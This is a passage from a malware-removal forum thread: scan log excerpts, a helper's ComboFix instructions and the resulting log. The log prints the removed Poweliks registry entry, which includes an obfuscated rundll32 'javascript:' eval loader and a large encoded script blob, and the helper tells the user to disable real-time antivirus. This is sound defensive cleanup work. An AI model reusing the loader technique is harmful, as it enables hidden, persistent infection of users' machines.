2014-10-15 02:32 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 02:32 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 02:32 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00005632 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-10-15 02:32 - 2014-07-08 17:30 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-10-15 02:32 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 02:32 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 02:32 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 02:32 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 02:32 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 02:32 - 2014-07-06 20:28 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 02:32 - 2014-06-27 19:21 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 02:32 - 2014-06-27 19:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 02:32 - 2014-06-27 19:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-08 12:40 - 2013-11-25 22:47 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-07 04:51 - 2009-07-13 23:34 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-07 04:51 - 2009-07-13 23:34 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-07 04:50 - 2010-11-20 16:01 - 00781298 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-07 04:43 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-07 01:50 - 2014-04-06 08:16 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-02 01:22 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-30 19:30 - 2014-04-06 08:13 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-30 06:24 - 2013-11-25 11:49 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-27 04:55 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Globalization
2014-10-25 22:10 - 2010-11-20 19:38 - 00000000 ____D () C:\Windows\DigitalLocker
2014-10-25 15:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-10-25 12:39 - 2011-06-02 16:34 - 00000000 ____D () C:\Windows\Panther
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-TW
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-HK
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-CN
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\tr-TR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\sv-SE
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ru-RU
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-PT
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-BR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pl-PL
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nl-NL
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nb-NO
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ko-KR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ja-JP
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\it-IT
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\hu-HU
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fr-FR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fi-FI
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\el-GR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\de-DE
2014-10-25 11:59 - 2014-02-20 19:10 - 00000000 ____D () C:\Windows\pss
2014-10-25 07:53 - 2014-02-20 19:45 - 00001067 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 9.lnk
2014-10-25 07:53 - 2014-02-20 19:45 - 00001055 _____ () C:\Users\Public\Desktop\TeamViewer 9.lnk
2014-10-25 07:49 - 2013-11-25 12:08 - 00000000 ___RD () C:\Users\Jack\Dropbox
2014-10-25 07:49 - 2013-11-25 12:01 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Dropbox
2014-10-25 07:48 - 2014-04-06 08:13 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-24 22:39 - 2014-04-06 08:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-24 22:39 - 2013-11-25 12:14 - 00001067 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-24 22:21 - 2014-04-25 22:28 - 00000005 _____ () C:\END
2014-10-24 22:18 - 2013-11-25 12:13 - 00000972 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-24 22:18 - 2013-11-25 12:13 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-24 22:10 - 2014-04-26 17:44 - 00192512 _____ () C:\Users\Jack\AppData\Local\ChromeHitoryDB
2014-10-24 20:37 - 2009-07-13 21:04 - 00000505 _____ () C:\Windows\win.ini
2014-10-18 20:29 - 2009-07-13 23:53 - 00032538 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-18 13:59 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2014-10-16 02:33 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 02:24 - 2009-07-13 23:46 - 00001515 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-16 02:23 - 2009-07-13 23:33 - 00315464 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:22 - 2014-04-30 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:04 - 2013-11-25 11:58 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 02:02 - 2013-11-25 11:58 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

Some content of TEMP:
====================
C:\Users\Jack\AppData\Local\Temp\UpdateFlashPlayer_7accf934.exe
C:\Users\Jack\AppData\Local\Temp\UpdateFlashPlayer_e32eb32e.exe
C:\Users\Jack\AppData\Local\Temp\wjetifgd.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-29 22:34

==================== End Of Log ============================



#8 deeprybka

  • Malware Response Team

Posted 08 November 2014 - 12:54 PM

Hi,

Malware Warning

All passwords should be changed immediately to include those used for banking, email, eBay, PayPal and online forums from a CLEAN COMPUTER.

Step 1

Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)
regards,
deeprybka

#9 Bobbie S.

  • Topic Starter
  • Members

Posted 08 November 2014 - 04:29 PM

WOW.  That took a long time.  Must have been badly infected.  Changing passwords right now on different (clean) computer.  Here is the log.

Bobbie

 

ComboFix 14-11-03.01 - Jack 11/08/2014  15:37:53.1.2 - x86
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3062.1922 [GMT -5:00]
Running from: c:\users\Jack\Downloads\ComboFix.exe
AV: Microsoft Security Essentials *Enabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Enabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\END
c:\users\Jack\AppData\Local\acikmao.dll
c:\windows\system32\drivers\etc\hosts.txt
c:\windows\system32\icsuwxe.dll
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         [encoded script data removed]
Jf1\NH0\gX%7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7J"t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[r%7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7S2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJf92S.^\}sbWi/%MSH%*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25-STo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSz12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z07r327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7I;,3Sz1ySz,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z%7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7Jy4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[kR\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\Jf92S"^7robWi;%.d&92S.m76szciZRDJf92S.^\}sbWi/%MS2N3S"^7robWiZRDJzRcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfI\STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&Sz12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z07r327FH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\]/O2Sz1ySz,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z%7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7J.t$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[b%-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-d&92S.m76szciZRDJf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.dXRcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&I\SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SH,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H%762A\FXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,yJXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO 
Jf1\Nz071z,~i;,+d&1\NH%7HXR\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\Jy4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[kR\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\Jf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJzRcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfI\SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SH1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H0\}227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 d&N~i/,yS2m-Nz071z,~iZO Jf1\Nz1WNht"i..$`3wANZIat O3}!w1j3wArA1AgMV_Cs9_KAs$.#] 4TYACC9S]h9I?q$;1oNnC0s$\FwC}yN_PM4\j!jW\owf}8]V`2s"}qIwjsB}qsM?V9"8j4Zi 9C}"]"p+tx]`N2(FwApj9d]3j?^F~At+9Wpq1L`3N"H3,w?qNo}+1oKhV2e!g2H!9s}"t4p+t7P`9$9FwMpj9d 2g|]!8;HowMpqBCUM3Z6otMNZsP}+[ I t\^!4Z}iwC}+1gp+WZ8`s/1sw2p^sGP3jCCM9L#3\Ip`2A9 sn}Tsh?AHTpis N+sdCfjCtTx&.i]GpjY4i`.]5j82p0s4} 4\]!9W[Tw2p0o\F.xPi} 1Vs\p [~IhNx#j4W ijnl3oG?+NUt`YU\!DCj`tj}j"&Pj"AtfjS}8oC"j9xjTw;Nys!pP]"IiI2j!gxi#j|p+[Xjis2}`N2`gMpot7}j8\P!\pt"xrI:].5jt 8qA;I_mqKT4a1u.~C!^xPixI.T#$p+N~PZ1dMjIp`s7]x~ACjgq 9I48oF::VgCTs_N2}/Ih42p NN\&\*J"4L}/12pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5.~2jjV jjwA}jwA}iwAp`oqV9\tT62HANBpz1}phV~t!wA}iwApio~pisatA}25(\vjjV jj`h#!^f}iwAp`oA5js~}i14HwNBpTB}IhV~t&a? 99pio~pis~}`s$5jD5j^V jjZh#!^f]VlMl`ox5js~}is~p`s$ppilIhV~Cs"? 995"$o?i1~}`s$5jwAp`s~]M&h#!^fj3lMl`owjs9\tTV~p`s$pio~pis~ifg? 99l"$o?i1tP0}259Ap`s~}jwA}jwAj9^|l`owV9\tT3SHwNBpTo~pis~}jwA}iwA|"$D?i1}P0}25avj^V jjwA}jwA}iwAp`oC`s1\tT3WHwNBpqB}IhV~t!wA}iwApio~piss[Aw25Djj^V jjwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~]:a? 
9|m%$o?i1~}`s$5japj^V jjwA}jwA]iwApq[A5js~}i1WHwNBpTo~pis~P\? 99pio~pi28[A}259Ap`s~}jkh8j^f}iwAp`of(V1\tTV~p`s$p#HZ?hV~t!wA}iwZN"$D?i1~}`s$5j^;j8V jjwA}jwA}iwAp`oA5js~}is~p`s$pio~pVtm sxre%x?H B_.VV\#...I39p0s~}jw?\VIh#i4|N^Vh":Ymj3wk5.1Hp#\S.s1`CF\1Ppa9N#Bw+3F~].jAq39cmZ6Dixgk}jwA}i9MHV(Xm!sq\iFl_wH+iaDjU1b}jxjiTjcooqpVwt8j9"I3wAp`sVPL~L82Whe+Dspjeh(2,:#P.V.0Hql+B_NTs~}jx|ehl?4!HD1 60]`*Xq.9rm^}IjxgIijxK#ijrj8t2`(.m]ft.p`s$p#tI.UAm]jl* s9MHo2qKh6N w}dI:l?mwVo[!wt#ywW %x4yBq5(.m]ft.p`s$p#3Hl!6\\x"jto16KssIpUNm#89uI.9c4AsV}V"I#3x|P!D?Kj]A5js~] Ik}Ajal!H&ph6m].aheV9KqsoH 6q[Z9 jK~j89jH.9H8.xyeVwAp`os:xVm#T5S^. N ]D4uVb\Lj! s1FHooD+u}\\ 1$`.j?.8sq}3a1n3^F V9cmZoA5jsj8#}!j:9*Nh\H.V6m MDAe%xc43q+?p.m]2t"5jwApj2H6jak8She#9Mmyo51M6~]TI7p`s$pioV}T}![!^A}i^yNT37pp92jo5.qxAypNI~njX*]3g!j"4xIG4}93Vq\i}nlqY]1iB7}T.g sTXCP^tKuGMl!1~}`s$qMX\m NxC!j1^VwIj"^Am sj93YNn stHss*pV2519oyjs4*iP"ppVBdH362jVNu:y4|+N.^^!9A62W!\f9ppZdc:!wU[UwHHo.Upio~pisIH24qCsz\Sz02IuAX^sVr59Apo2Mt!wA}jwA#Tw.5Zox5j2yipNGp`s/.hVM+ip2}VgS} X}+%sMP.0iqVFjM\f?`s\8fADP.aMJf9AjV4F:j9~}i9`.NI/rj12pTYA]2Kh]3^hIiq ?32yijI$g2wI?2Vwej"ltVwACi`y|Z}&q357HuplpZ1+13075qA H3wZ}iwfIps"|TwV[Z.$5j^ZrU,2}!Xq]2Kh}P4qm0B9UMW7J"t5p`.4phtsli9G}jwACjO!+Vs}?u5l^ZF/\2xKpNj7624A}jw263^q?V[I5js~jiqXS2N(ms\Zj!*sF&"MtzD1Iu[^r31 F21$\2"3KVIGt2X3}V\Hto"SpNi\dX,~[T1}}AI$ph[N}39U}jwAH%TDp%i7r/,~}`1/f~sI`s~}31 n29ZHjRcIAoA5jpWj#A&jq.q+h^M5z,UH2&*Jf9ZH3H"|"1&]A6/gx9jm0IAiMxl8&gLP Oqlb1&}2s~}j/Hjs5.p ]sr39~J!gH[""p}T}Zj9IA\8s!mV\xIG}+C29xtxI\]u9Apq]Am3qy[q1AN2t\mVGZp%37[!&h]o^yIiq.?!,;}8o-d&9Ap:}2i.~![Fw*ihRX`#I"js~] s;|2t$pVo"p%AIHC"MFTg ?!40N9A"82pX}2wp?VVq\&gw\Kt!C 9;S8B:m227\91.l`sf}h]^|TY`tL9XjV^Zrj12p#AZC_NX\2Ahj_IMi(^Ae!4X}V8q}ZBA9VVa\"HZl:AeNz0S9Ia}x1!iUI*I%s}I!t \.HA5!^WKb, F!8Y[L1\JzD!?0Tc5KIUt%3SI:IAIiqy+VNUtL4Ajh\&pio~I3qZ}j}ugx9c4q3Si(0Dn.4A]u9Ap:$V5!pZ 9tA+`3aIiH"li}2jsw(Cp9&+ 
VXH"Ia\.1f\y~51A9xi29Z]^|]3&*H:txny9UtrYt.wsUmUsANUtAH2^WJfI\SqLXNi6Utstsg9I`sh8VjHKt*n3"6};1K\!9~}is~I`s$piotphV~t!wA}ixApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}KZ,(r0Gf}Gxq.a8 p"tVDN(Ub08&z,\fk1/L0W8H*1&I^8j*UNq*Tl q^SVV![MjX8f~K}pByl 1^^H*HI(xylVskpKKv] j!]!j/}q[t9M.V8f9VNq*%N!s74sA7Cl!tp&W|![4q!Y^^s*s(ftXSsIk8Z~C(x![ w/j_B\9M.N[/3k|VNVq3)KT9l[Mj4p#Z/q#x4Up.\^!dqFj94 p.\VZ/ Fj98U5yH^ONo?3TFoYx4 I}NuB9|j3aF?l98U\\l+iK9ubkB_b;:MjE}2IKJf~cHfz/B!Oh|:d1;o3K q1lm2Is4jXUN *ZC8VJV^EN!#H4fA:to9+mgVmH*ge(xyCMw/pPKvIy#!"M.kt N4NV.!4fBVN *N[M^\8s~\l XZ}pqKFVN4&Cjy}oq.\kl38MSo}+w/4w[w(:I7[qAH4y1$|jAK}+pT}Z44}U^!}#O9(j6(} VT\.DN(U6(#j^E[ftXpjX4.`sE9fHHpj6(.`V;N9\H(j3TFsD98U"pNuB9|j3aFU*B(x\\lyjKBCz/BCz/\/ShSG)w}h!nW}!n5ysT5+LgZU/g/xZ1/Ug/} #S|92a6S!F\(4wNG/{v#*#Ei@#@&77'lc]E `w3E~k6,^nx-lmJS!Bq#p@#@&7)@#@&7^mY^tvn*@#@&i @#@&d)@#@&N@#@&msWk+cbpuq0qAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-10-08 to 2014-11-08  )))))))))))))))))))))))))))))))
.
.
2014-11-08 21:22 . 2014-11-08 21:22 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-11-08 17:42 . 2014-11-08 17:45 -------- d-----w- C:\FRST
2014-11-08 06:34 . 2014-11-08 06:34 39464 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{663C1E5C-F5CB-4675-B9F2-69A490CE2832}\MpKsl4d4a1af2.sys
2014-11-08 02:02 . 2014-11-08 02:02 -------- d-----w- c:\programdata\NeseVdol
2014-11-08 02:02 . 2014-11-08 02:02 -------- d-----w- c:\programdata\UehaLwahi
